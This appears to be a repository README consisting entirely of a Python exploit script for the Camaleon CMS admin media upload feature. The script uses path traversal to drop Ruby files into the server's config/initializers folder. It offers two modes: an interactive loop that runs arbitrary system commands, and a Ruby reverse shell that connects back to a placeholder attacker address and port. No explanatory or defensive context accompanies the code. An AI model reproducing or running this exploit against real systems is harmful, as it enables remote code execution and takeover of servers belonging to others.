README.md
Rendering markdown...
import requests
def exploit_camaleon(auth_token, session_token, target_url, payload_type):
# Define the headers
headers = {
'User-Agent': 'Mozilla/5.0',
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga',
'Accept': '*/*',
'Connection': 'keep-alive',
}
# Define the cookies (auth_token and session token)
cookies = {
'auth_token': auth_token,
'_cms_session': session_token,
}
# Repeated command execution functionality
if payload_type == "command_execution":
while True:
# Prompt the user for a command to execute
command = input("Enter a system command to execute (or type 'exit' to quit): ")
if command.lower() == "exit":
print("Exiting command execution mode.")
break
# Command execution payload
payload = (
'puts "==============================="\r\n'
'puts "= EXECUTING SYSTEM COMMANDS ="\r\n'
'puts "==============================="\r\n'
f'system("{command}")\r\n' # Execute the entered command
'puts "==============================="\r\n'
)
file_name = 'command_exec.rb'
# Multipart form data with the chosen payload
data = (
f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
f'Content-Type: text/x-ruby-script\r\n\r\n'
f'{payload}\r\n'
f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
f'Content-Disposition: form-data; name="folder"\r\n\r\n'
f'../../../config/initializers/\r\n'
f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
f'true\r\n'
f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
)
# Send the POST request
response = requests.post(
f"{target_url}/admin/media/upload?actions=false",
headers=headers,
cookies=cookies,
data=data,
verify=False # Disable SSL verification (adjust as needed)
)
# Check if the exploit was successful
if response.status_code == 200:
print(f"Command '{command}' executed successfully!")
print("Response: ", response.text) # Print response content to debug
else:
print(f"Failed to execute '{command}' with status code: {response.status_code}")
print("Response: ", response.text) # Print the response content for debugging
elif payload_type == "reverse_shell":
# Ruby reverse shell payload
payload = (
'require \'socket\'\r\n'
's = TCPSocket.open(\'your_ip\', your_port)\r\n'
'while (cmd = s.gets)\r\n'
' IO.popen(cmd, \'r\') do |io|\r\n'
' s.print io.read\r\n'
' end\r\n'
'end\r\n'
)
file_name = 'reverse_shell.rb'
# Multipart form data with the reverse shell payload
data = (
f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
f'Content-Type: text/x-ruby-script\r\n\r\n'
f'{payload}\r\n'
f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
f'Content-Disposition: form-data; name="folder"\r\n\r\n'
f'../../../config/initializers/\r\n'
f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
f'true\r\n'
f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
)
# Send the POST request for reverse shell
response = requests.post(
f"{target_url}/admin/media/upload?actions=false",
headers=headers,
cookies=cookies,
data=data,
verify=False # Disable SSL verification (adjust as needed)
)
# Check if the exploit was successful
if response.status_code == 200:
print(f"Exploit executed successfully with reverse shell!")
else:
print(f"Failed with status code: {response.status_code}")
print("Response: ", response.text)
if __name__ == "__main__":
# Replace these with actual tokens and target URL
auth_token = "your_auth_token_here"
session_token = "your_session_token_here"
target_url = "https://target_site_here"
# Choose the type of payload: "reverse_shell" or "command_execution"
payload_type = input("Enter payload type ('reverse_shell' or 'command_execution'): ").strip()
exploit_camaleon(auth_token, session_token, target_url, payload_type)